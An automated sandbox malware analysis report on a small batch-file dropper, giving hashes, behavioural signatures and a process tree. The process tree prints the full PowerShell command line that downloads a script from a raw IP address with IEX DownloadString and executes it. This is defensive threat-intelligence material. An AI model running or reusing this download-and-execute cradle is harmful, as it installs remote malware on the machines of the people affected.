Analysis
- max time kernel: 103s
- max time network: 155s
- platform: windows10_x64
- resource: win10v200217
- submitted: 16-03-2020 15:10
Static task: static1
Behavioral task: behavioral1
- Sample: ePwu3qhG.bat
- Resource: win7v200217 (windows7_x64)
- 0 signatures, 0 seconds
Behavioral task: behavioral2
- Sample: ePwu3qhG.bat
- Resource: win10v200217 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: ePwu3qhG.bat
- Size: 195B
- MD5: aaa7b25a5b6939e0c9f77a1d8c141ff1
- SHA1: 9a68e6ebd88ee65a64c80eabd25057e8b1f7a0c3
- SHA256: d03a1ed079e497d770b0661e81fe675fe379107ec06f75ce916466d2026b9310
- SHA512: bc6ac64ddfeeed68bb844d913716f47f951b488d2a509993e73202577b72b129d4c725baeb5fc5bf191c97a4cb8b90d319ed23b8c9056eeb9d9d5d34acd0976e
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Source: ps1.dropper
- URLs: http://185.103.242.78/pastes/ePwu3qhG
Signatures
- Program crash (1 IoC)
  Processes:
    pid   pid_target  process       target process
    3556  3920        WerFault.exe  powershell.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
    description                 pid   process
    Token: SeRestorePrivilege   3556  WerFault.exe
    Token: SeBackupPrivilege    3556  WerFault.exe
    Token: SeDebugPrivilege     3556  WerFault.exe
- Suspicious behavior: EnumeratesProcesses (14 IoCs)
  Processes:
    pid   process
    3556  WerFault.exe  (14 identical entries)
Processes
- C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ePwu3qhG.bat"
  PID: 3952
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ePwu3qhG');Invoke-HKEJEPZNRMGY;Start-Sleep -s 10000"
    PID: 3920
    - C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3920 -s 704
      PID: 3556
      Signatures:
      - Program crash
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses